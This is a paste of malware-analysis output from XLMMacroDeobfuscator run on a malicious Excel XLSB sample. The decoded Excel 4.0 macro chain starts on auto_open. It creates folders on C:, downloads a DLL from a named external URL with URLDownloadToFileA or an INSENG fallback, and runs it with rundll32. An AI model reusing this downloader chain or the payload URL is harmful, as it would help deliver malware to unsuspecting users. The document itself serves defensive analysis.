dissectmalware

XLSB sample - XLMDeobfuscator output

Nov 29th, 2020
  1. C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\tests-xlm\test2.xlsb
  2.  
  3. _ _______
  4. |\ /|( \ ( )
  5. ( \ / )| ( | () () |
  6. \ (_) / | | | || || |
  7. ) _ ( | | | |(_)| |
  8. / ( ) \ | | | | | |
  9. ( / \ )| (____/\| ) ( |
  10. |/ \|(_______/|/ \|
  11. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  12. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  13. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  14. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  15. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  16. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  17. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  18. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  19.  
  20.  
  21. XLMMacroDeobfuscator(v0.1.6) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  22.  
  23. File: C:\Users\user\Downloads\tests-xlm\test2.xlsb
  24.  
  25. Unencrypted xlsb file
  26.  
  27. [Loading Cells]
  28. auto_open: auto_open->jf!$T$73
  29. [Starting Deobfuscation]
  30. CELL:T73 , FullEvaluation , $GU$614()
  31. CELL:GU614 , FullEvaluation , SET.NAME(wnzddroibxuqpv,http://liveswindow.casa/opzi0n1.dll)
  32. CELL:GU615 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$BB$54)
  33. CELL:GU616 , FullEvaluation , $AU$259()
  34. CELL:AU259 , FullEvaluation , FORMULA(http://liveswindow.casa/opzi0n1.dll,$BB$54)
  35. CELL:GU617 , FullEvaluation , RUN(jf!BV2537)
  36. CELL:BV2537 , FullEvaluation , SET.NAME(wnzddroibxuqpv,C:\DlkYKlI\UiQhTXx\sncwner.dll,DllRegisterServer)
  37. CELL:BV2538 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$R$1071)
  38. CELL:BV2539 , FullEvaluation , $AU$259()
  39. CELL:AU259 , FullEvaluation , FORMULA(C:\DlkYKlI\UiQhTXx\sncwner.dll,DllRegisterServer,$R$1071)
  40. CELL:BV2540 , FullEvaluation , RUN(jf!EB1002)
  41. CELL:EB1002 , FullEvaluation , SET.NAME(wnzddroibxuqpv,C:\DlkYKlI\UiQhTXx\sncwner.dll)
  42. CELL:EB1003 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$H$2491)
  43. CELL:EB1004 , FullEvaluation , $AU$259()
  44. CELL:AU259 , FullEvaluation , FORMULA(C:\DlkYKlI\UiQhTXx\sncwner.dll,$H$2491)
  45. CELL:EB1005 , FullEvaluation , RUN(jf!FH2455)
  46. CELL:FH2455 , FullEvaluation , SET.NAME(wnzddroibxuqpv,URLMON)
  47. CELL:FH2456 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$IE$1801)
  48. CELL:FH2457 , FullEvaluation , $AU$259()
  49. CELL:AU259 , FullEvaluation , FORMULA(URLMON,$IE$1801)
  50. CELL:FH2458 , FullEvaluation , RUN(jf!EN2907)
  51. CELL:EN2907 , FullEvaluation , SET.NAME(wnzddroibxuqpv,URLDownloadToFileA)
  52. CELL:EN2908 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$FM$1658)
  53. CELL:EN2909 , FullEvaluation , $AU$259()
  54. CELL:AU259 , FullEvaluation , FORMULA(URLDownloadToFileA,$FM$1658)
  55. CELL:EN2910 , FullEvaluation , RUN(jf!FM695)
  56. CELL:FM695 , FullEvaluation , SET.NAME(wnzddroibxuqpv,JJCCJJ)
  57. CELL:FM696 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$HN$989)
  58. CELL:FM697 , FullEvaluation , $AU$259()
  59. CELL:AU259 , FullEvaluation , FORMULA(JJCCJJ,$HN$989)
  60. CELL:FM698 , FullEvaluation , RUN(jf!BH797)
  61. CELL:BH797 , FullEvaluation , SET.NAME(wnzddroibxuqpv,Shell32)
  62. CELL:BH798 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$GW$1910)
  63. CELL:BH799 , FullEvaluation , $AU$259()
  64. CELL:AU259 , FullEvaluation , FORMULA(Shell32,$GW$1910)
  65. CELL:BH800 , FullEvaluation , RUN(jf!ED1009)
  66. CELL:ED1009 , FullEvaluation , SET.NAME(wnzddroibxuqpv,ShellExecuteA)
  67. CELL:ED1010 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$DL$2966)
  68. CELL:ED1011 , FullEvaluation , $AU$259()
  69. CELL:AU259 , FullEvaluation , FORMULA(ShellExecuteA,$DL$2966)
  70. CELL:ED1012 , FullEvaluation , RUN(jf!IC1996)
  71. CELL:IC1996 , FullEvaluation , SET.NAME(wnzddroibxuqpv,JJCCCCJ)
  72. CELL:IC1997 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$CS$251)
  73. CELL:IC1998 , FullEvaluation , $AU$259()
  74. CELL:AU259 , FullEvaluation , FORMULA(JJCCCCJ,$CS$251)
  75. CELL:IC1999 , FullEvaluation , RUN(jf!GT1898)
  76. CELL:GT1898 , FullEvaluation , SET.NAME(wnzddroibxuqpv,Open)
  77. CELL:GT1899 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$HD$2170)
  78. CELL:GT1900 , FullEvaluation , $AU$259()
  79. CELL:AU259 , FullEvaluation , FORMULA(Open,$HD$2170)
  80. CELL:GT1901 , FullEvaluation , RUN(jf!T2783)
  81. CELL:T2783 , FullEvaluation , SET.NAME(wnzddroibxuqpv,regsvr32.exe)
  82. CELL:T2784 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$Z$2857)
  83. CELL:T2785 , FullEvaluation , $AU$259()
  84. CELL:AU259 , FullEvaluation , FORMULA(regsvr32.exe,$Z$2857)
  85. CELL:T2786 , FullEvaluation , RUN(jf!DD1093)
  86. CELL:DD1093 , FullEvaluation , SET.NAME(wnzddroibxuqpv,rundll32.exe)
  87. CELL:DD1094 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$FB$2223)
  88. CELL:DD1095 , FullEvaluation , $AU$259()
  89. CELL:AU259 , FullEvaluation , FORMULA(rundll32.exe,$FB$2223)
  90. CELL:DD1096 , FullEvaluation , RUN(jf!HK1793)
  91. CELL:HK1793 , FullEvaluation , SET.NAME(wnzddroibxuqpv,C:\DlkYKlI)
  92. CELL:HK1794 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$IM$373)
  93. CELL:HK1795 , FullEvaluation , $AU$259()
  94. CELL:AU259 , FullEvaluation , FORMULA(C:\DlkYKlI,$IM$373)
  95. CELL:HK1796 , FullEvaluation , RUN(jf!HM2293)
  96. CELL:HM2293 , FullEvaluation , SET.NAME(wnzddroibxuqpv,C:\DlkYKlI\UiQhTXx)
  97. CELL:HM2294 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$BB$248)
  98. CELL:HM2295 , FullEvaluation , $AU$259()
  99. CELL:AU259 , FullEvaluation , FORMULA(C:\DlkYKlI\UiQhTXx,$BB$248)
  100. CELL:HM2296 , FullEvaluation , RUN(jf!GA2355)
  101. CELL:GA2355 , FullEvaluation , SET.NAME(wnzddroibxuqpv,Kernel32)
  102. CELL:GA2356 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$FR$295)
  103. CELL:GA2357 , FullEvaluation , $AU$259()
  104. CELL:AU259 , FullEvaluation , FORMULA(Kernel32,$FR$295)
  105. CELL:GA2358 , FullEvaluation , RUN(jf!GT2897)
  106. CELL:GT2897 , FullEvaluation , SET.NAME(wnzddroibxuqpv,CreateDirectoryA)
  107. CELL:GT2898 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$GL$2952)
  108. CELL:GT2899 , FullEvaluation , $AU$259()
  109. CELL:AU259 , FullEvaluation , FORMULA(CreateDirectoryA,$GL$2952)
  110. CELL:GT2900 , FullEvaluation , RUN(jf!HO2319)
  111. CELL:HO2319 , FullEvaluation , SET.NAME(wnzddroibxuqpv,JCJ)
  112. CELL:HO2320 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$EQ$7)
  113. CELL:HO2321 , FullEvaluation , $AU$259()
  114. CELL:AU259 , FullEvaluation , FORMULA(JCJ,$EQ$7)
  115. CELL:HO2322 , FullEvaluation , RUN(jf!R450)
  116. CELL:R450 , FullEvaluation , SET.NAME(wnzddroibxuqpv,INSENG)
  117. CELL:R451 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$GA$816)
  118. CELL:R452 , FullEvaluation , $AU$259()
  119. CELL:AU259 , FullEvaluation , FORMULA(INSENG,$GA$816)
  120. CELL:R453 , FullEvaluation , RUN(jf!H1261)
  121. CELL:H1261 , FullEvaluation , SET.NAME(wnzddroibxuqpv,DownloadFile)
  122. CELL:H1262 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$AQ$2363)
  123. CELL:H1263 , FullEvaluation , $AU$259()
  124. CELL:AU259 , FullEvaluation , FORMULA(DownloadFile,$AQ$2363)
  125. CELL:H1264 , FullEvaluation , RUN(jf!HT202)
  126. CELL:HT202 , FullEvaluation , SET.NAME(wnzddroibxuqpv,BCCJ)
  127. CELL:HT203 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$IG$1852)
  128. CELL:HT204 , FullEvaluation , $AU$259()
  129. CELL:AU259 , FullEvaluation , FORMULA(BCCJ,$IG$1852)
  130. CELL:HT205 , FullEvaluation , RUN(jf!CI2596)
  131. CELL:CI2596 , FullEvaluation , SET.NAME(wnzddroibxuqpv,uOIxdmml)
  132. CELL:CI2597 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$HF$2029)
  133. CELL:CI2598 , FullEvaluation , $AU$259()
  134. CELL:AU259 , FullEvaluation , FORMULA(uOIxdmml,$HF$2029)
  135. CELL:CI2599 , FullEvaluation , RUN(jf!GH2231)
  136. CELL:GH2231 , FullEvaluation , SET.NAME(wnzddroibxuqpv,ePIPtHGW)
  137. CELL:GH2232 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$EP$1509)
  138. CELL:GH2233 , FullEvaluation , $AU$259()
  139. CELL:AU259 , FullEvaluation , FORMULA(ePIPtHGW,$EP$1509)
  140. CELL:GH2234 , FullEvaluation , RUN(jf!A2105)
  141. CELL:A2105 , FullEvaluation , SET.NAME(wnzddroibxuqpv,SVNmBteM)
  142. CELL:A2106 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$CQ$2243)
  143. CELL:A2107 , FullEvaluation , $AU$259()
  144. CELL:AU259 , FullEvaluation , FORMULA(SVNmBteM,$CQ$2243)
  145. CELL:A2108 , FullEvaluation , $T$74()
  146. CELL:T74 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\DlkYKlI",0)
  147. CELL:T75 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\DlkYKlI\UiQhTXx",0)
  148. CELL:T77 , FullEvaluation , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://liveswindow.casa/opzi0n1.dll","C:\DlkYKlI\UiQhTXx\sncwner.dll",0,0)
  149. CELL:T79 , FullEvaluation , IF($T$78<>0)
  150. CELL:T80 , FullEvaluation , CALL("INSENG","DownloadFile","BCCJ","http://liveswindow.casa/opzi0n1.dll","C:\DlkYKlI\UiQhTXx\sncwner.dll",1)
  151. CELL:T82 , FullEvaluation , END.IF
  152. CELL:T84 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\DlkYKlI\UiQhTXx\sncwner.dll,DllRegisterServer",0,0)
  153. CELL:T87 , End , HALT()
  154.  
  155. Files:
  156.  
  157. [END of Deobfuscation]
  158. time elapsed: 1.1293022632598877